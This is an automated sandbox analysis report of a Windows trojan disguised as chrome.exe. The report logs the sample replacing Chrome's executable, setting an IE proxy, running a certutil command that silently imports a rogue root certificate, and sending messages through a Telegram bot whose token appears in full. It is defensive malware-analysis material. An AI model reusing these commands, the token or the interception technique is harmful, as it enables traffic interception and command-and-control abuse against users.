Edit tour

Windows Analysis Report
chrome11.exe

Overview

General Information

Sample name:	chrome11.exe
Analysis ID:	1577377
MD5:	5b39766f490f17925defaee5de2f9861
SHA1:	9c89f2951c255117eb3eebcd61dbecf019a4c186
SHA256:	de615656d7f80b5e01bc6a604a780245ca0ccefd920a6e2f1439bf27c02b7b7a
Tags:	18521511316185215113209bulletproofexeuser-abus3reports
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Enables a proxy for the internet explorer

Infects executable files (exe, dll, sys, html)

Installs new ROOT certificates

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sets a proxy for the internet explorer

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops certificate files (DER)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious PFX File Creation

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

chrome11.exe (PID: 7636 cmdline: "C:\Users\user\Desktop\chrome11.exe" MD5: 5B39766F490F17925DEFAEE5DE2F9861)

certutil.exe (PID: 7920 cmdline: "C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\user\AppData\Local\Temp\tmpC4B4.tmp" MD5: F17616EC0522FC5633151F7CAA278CAA)

conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Sigma Signatures

Sigma detected: Suspicious PFX File Creation

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\chrome11.exe, ProcessId: 7636, TargetFilename: C:\Users\user\AppData\Local\Temp\rootCert.pfx

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: localhost:8777, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\chrome11.exe, ProcessId: 7636, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	ReversingLabs: Detection: 31%
Source: C:\Program Files\Google\Chrome\Application\original.exe (copy)	ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: chrome11.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Source: C:\Users\user\Desktop\chrome11.exe

Directory created: C:\Program Files\Google\Chrome\Application\chrome.exe

Jump to behavior

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49707 version: TLS 1.2

Source: chrome11.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\HP\Desktop\SilentProxy\bin\Debug\chrome.pdb source: chrome11.exe, chrome.exe.0.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\chrome11.exe

System file written: C:\Program Files\Google\Chrome\Application\chrome.exe

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe	Code function: 4x nop then jmp 00007FF887C06050h	0_2_00007FF887C05EDE
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 4x nop then mov edx, dword ptr [ebp-18h]	0_2_00007FF887C0A1F3
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 4x nop then jmp 00007FF887C10469h	0_2_00007FF887C10413
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 4x nop then dec eax	0_2_00007FF887E00F97
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 4x nop then dec eax	0_2_00007FF887E06E07

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

HTTP traffic detected: POST /bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/sendMessage HTTP/1.1Content-Type: application/json; charset=utf-8Host: api.telegram.orgContent-Length: 95Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: api.telegram.org

Source: unknown

Source: chrome11.exe, chrome.exe.0.dr	String found in binary or memory: http://.css
Source: chrome11.exe, chrome.exe.0.dr	String found in binary or memory: http://.jpg
Source: chrome11.exe, 00000000.00000002.1477410588.000001D2308E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: chrome11.exe, chrome.exe.0.dr	String found in binary or memory: http://html4/loose.dtd
Source: chrome11.exe, 00000000.00000002.1477410588.000001D2308BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chrome11.exe, 00000000.00000002.1477410588.000001D2308BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: chrome11.exe, chrome.exe.0.dr	String found in binary or memory: https://api.telegram.org/bot
Source: chrome11.exe, 00000000.00000002.1477410588.000001D230837000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/
Source: chrome11.exe, 00000000.00000002.1477410588.000001D230837000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/sendMessage

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49707 version: TLS 1.2

E-Banking Fraud

Sets a proxy for the internet explorer

Source: C:\Users\user\Desktop\chrome11.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ProxyServer

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe	File created: C:\Users\user\AppData\Local\Temp\rootCert.pfx			Jump to dropped file
Source: C:\Users\user\Desktop\chrome11.exe	File created: C:\Users\user\AppData\Local\Temp\tmpC4B4.tmp			Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Enables a proxy for the internet explorer

Source: C:\Users\user\Desktop\chrome11.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ProxyEnable

Jump to behavior

Sets a proxy for the internet explorer

Source: C:\Users\user\Desktop\chrome11.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ProxyServer

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe	Code function: 0_2_00007FF887C04D32	0_2_00007FF887C04D32
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 0_2_00007FF887C03F86	0_2_00007FF887C03F86
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 0_2_00007FF887C114C8	0_2_00007FF887C114C8
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 0_2_00007FF887C114C0	0_2_00007FF887C114C0
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 0_2_00007FF887DF3980	0_2_00007FF887DF3980
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 0_2_00007FF887DF91DD	0_2_00007FF887DF91DD

Source: Joe Sandbox View	Dropped File: C:\Program Files\Google\Chrome\Application\chrome.exe DE615656D7F80B5E01BC6A604A780245CA0CCEFD920A6E2F1439BF27C02B7B7A
Source: Joe Sandbox View	Dropped File: C:\Program Files\Google\Chrome\Application\original.exe (copy) DE615656D7F80B5E01BC6A604A780245CA0CCEFD920A6E2F1439BF27C02B7B7A

Source: chrome11.exe, 00000000.00000000.1395181711.000001D22E7A2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamechrome.exe< vs chrome11.exe
Source: chrome11.exe, 00000000.00000002.1477410588.000001D230922000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamechrome.exe< vs chrome11.exe
Source: chrome11.exe, 00000000.00000002.1477410588.000001D230922000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs chrome11.exe
Source: chrome11.exe, 00000000.00000002.1477410588.000001D230922000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ,\\StringFileInfo\\040904B0\\OriginalFilename vs chrome11.exe
Source: chrome11.exe, 00000000.00000002.1477410588.000001D230922000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ,\\StringFileInfo\\000004B0\\OriginalFilename vs chrome11.exe
Source: chrome11.exe	Binary or memory string: OriginalFilenamechrome.exe< vs chrome11.exe

Source: classification engine

Classification label: mal84.spre.bank.troj.adwa.evad.winEXE@4/14@1/1

Source: C:\Users\user\Desktop\chrome11.exe

File created: C:\Program Files\Google\Chrome\Application\chrome.exe

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\84ef8e32cf3dd22e15e36759d999f0aa_9e146be9-c76a-4720-bcdb-53011b87bd06

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03

Source: C:\Users\user\Desktop\chrome11.exe

File created: C:\Users\user\AppData\Local\Temp\unique_laptops.txt

Jump to behavior

Source: chrome11.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: chrome11.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%

Source: C:\Users\user\Desktop\chrome11.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome11.exe

ReversingLabs: Detection: 31%

Source: chrome11.exe

String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>

Source: C:\Users\user\Desktop\chrome11.exe

File read: C:\Users\user\Desktop\chrome11.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\chrome11.exe "C:\Users\user\Desktop\chrome11.exe"
Source: C:\Users\user\Desktop\chrome11.exe	Process created: C:\Windows\System32\certutil.exe "C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\user\AppData\Local\Temp\tmpC4B4.tmp"
Source: C:\Windows\System32\certutil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\chrome11.exe	Process created: C:\Windows\System32\certutil.exe "C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\user\AppData\Local\Temp\tmpC4B4.tmp"	Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: esdsip.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certenroll.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsparse.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: webservices.dll	Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe

Directory created: C:\Program Files\Google\Chrome\Application\chrome.exe

Jump to behavior

Source: chrome11.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: chrome11.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: chrome11.exe

Static file information: File size 4767744 > 1048576

Source: chrome11.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x47de00

Source: chrome11.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: chrome11.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Users\HP\Desktop\SilentProxy\bin\Debug\chrome.pdb source: chrome11.exe, chrome.exe.0.dr

Source: C:\Users\user\Desktop\chrome11.exe	Code function: 0_2_00007FF887C0B648 push es; retn 7002h	0_2_00007FF887C0C0CD
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 0_2_00007FF887C0755A push ebx; iretd	0_2_00007FF887C0756A
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 0_2_00007FF887C173AC push eax; retf	0_2_00007FF887C173AD
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 0_2_00007FF887DFEFFF push ebp; iretd	0_2_00007FF887DFF000
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 0_2_00007FF887E03EFA push es; iretd	0_2_00007FF887E03EFC
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 0_2_00007FF887DF270C push E8FFFFFDh; retf	0_2_00007FF887DF2711
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 0_2_00007FF887E0557C push esp; iretd	0_2_00007FF887E055D9
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 0_2_00007FF887DF52F5 push esp; iretd	0_2_00007FF887DF55D9

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\chrome11.exe

System file written: C:\Program Files\Google\Chrome\Application\chrome.exe

Jump to behavior

Installs new ROOT certificates

Source: C:\Windows\System32\certutil.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7770213ABB819C96C7B1A595FF6DEBBB9E0428B0 Blob	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7770213ABB819C96C7B1A595FF6DEBBB9E0428B0 Blob	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7770213ABB819C96C7B1A595FF6DEBBB9E0428B0 Blob	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7770213ABB819C96C7B1A595FF6DEBBB9E0428B0 Blob	Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe	File created: C:\Program Files\Google\Chrome\Application\chrome.exe			Jump to dropped file
Source: C:\Users\user\Desktop\chrome11.exe	File created: C:\Program Files\Google\Chrome\Application\original.exe (copy)			Jump to dropped file

Source: C:\Users\user\Desktop\chrome11.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT			Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT			Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
